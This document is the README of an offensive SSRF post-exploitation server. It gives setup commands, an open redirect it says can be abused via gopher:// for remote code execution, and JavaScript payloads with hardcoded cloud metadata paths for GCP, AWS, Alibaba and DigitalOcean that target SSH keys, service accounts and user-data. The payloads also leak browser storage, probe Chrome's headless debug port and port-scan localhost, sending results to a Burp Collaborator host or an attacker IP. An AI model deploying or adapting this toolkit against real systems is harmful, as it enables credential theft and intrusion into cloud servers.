Server prepared for SSRF post exploitation, javascript exploits, tools and open redirect.
AFTER SSRF
git clone https://github.com/RafaelSantos025/js-ssrf.gi
cd js-ssrf/
npm install express
node server.js
- Browser Storage Leak
- Chrome Headless Debug Enabled
- Leak Browser Information (Plugins, versions, etc ...)
- Cloud Metadata Information
- Local Port Scanner
- Open redirect
Any request that starts with /openredirect will redirect to the passed URL in the url parameter with the given scheme and parameters. You can abuse of the gopher:// scheme to get remote code execution.
Redirect to Google Example: http://127.0.0.1:2222/openredirect?url=https://www.google.com
Browser Storage Leak, Chrome Headless Debug Enabled, Leak Browser Information (Plugins, versions, etc ...), Cloud Metadata Information and Local Port Scanner
You need to edit the HTML page located at htmls/js-exploits.html (every request to the root page will trigger this HTML).
Edit the value of collaboratorServer to your burp collaborator or log server, because this is how the server will retrieve the sensitive information.
//Collaborator server to receive info
var collaboratorServer = "ysu632p7xzqy8028y8ymxmo3tuzkn9.burpcollaborator.net";
If you don't have a log or burp collaborator server, this server has one in the /log path:
Example: http://127.0.0.1:2222/log?msg=LOGTHIS
Server Log Output:
Connection received: ::ffff:127.0.0.1
/log?msg=LOGTHIS
To use this server log you just need to edit the value of collaboratorServer to your IP address and port:
Example (External IP):
//Collaborator server to receive info
var collaboratorServer = "208.12.33.44:2222";
Uncomment the following lines that call the respective exploit function that you want:
//Browser Storage Leak
//localStorageLeak();
//Try to fetch Chrome Headless debug port
//chromeHeadless();
//Get browser information (Plugins, versions, etc ...)
//getBrowserInfo();
//GET Cloud metadata information
//cloudMetadata(googleMetadataServer, googleMetadataPaths, googleHeaders);
//Local port scanner
//portScanner("127.0.0.1", communPorts);
To help you, I already hardcoded some metadata servers and their paths to leak the desired information:
//Google Cloud
var googleMetadataServer = "metadata.google.internal";
var googleMetadataPaths = {"SSH-Keys: ": "/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json", "Service Accounts: ": "/computeMetadata/v1/instance/service-accounts/?recursive=true&alt=json", "Hostname: ": "/computeMetadata/v1/instance/hostname"}
var googleHeaders = {"X-Google-Metadata-Request": "true"}
//Alibaba Cloud
var alibabaMetadataServer = "100.100.100.200";
var alibabaMetadataPaths = {"SSH-Keys: ":"/latest/meta-data/public-keys/0/openssh-key", "Hostname: ": "/latest/meta-data/hostname", "User-Data: ": "/latest/user-data"};
//Amazon AWS & D.O
var othersMetadataServers = "169.254.169.254";
//Amazon
var amazonMetadataPaths = {"SSH-Keys: ": "/latest/meta-data/public-keys/0/openssh-key", "Hostname: ": "/latest/meta-data/public-hostname", "AMI-ID: ": "/latest/meta-data/ami-id"};
//Digital Ocean
var digitalOceanPaths = {"User-data": "/metadata/v1/user-data", "Hostname: ": "/metadata/v1/hostname", "SSH-Keys: ": "/metadata/v1/public-keys"}
//Local port scanner | Commun ports
var communPorts = [80, 81, 300, 443, 591, 593, 832, 981, 1010, 1311, 2082, 2087, 2095, 2096, 2480, 3000, 3128, 3333, 4243, 4567, 4711, 4712, 4993, 5000, 5104, 5108, 5800, 6543, 7000, 7396, 7474, 8000, 8001, 8008, 8014, 8042, 8069, 8080, 8081, 8088, 8090, 8091, 8118, 8123, 8172, 8222, 8243, 8280, 8281, 8333, 8443, 8500, 8834, 8880, 8888, 8983, 9000, 9043, 9060, 9080, 9090, 9091, 9200, 9443, 9800, 9981, 12443, 16080, 18091, 18092, 20720, 28017]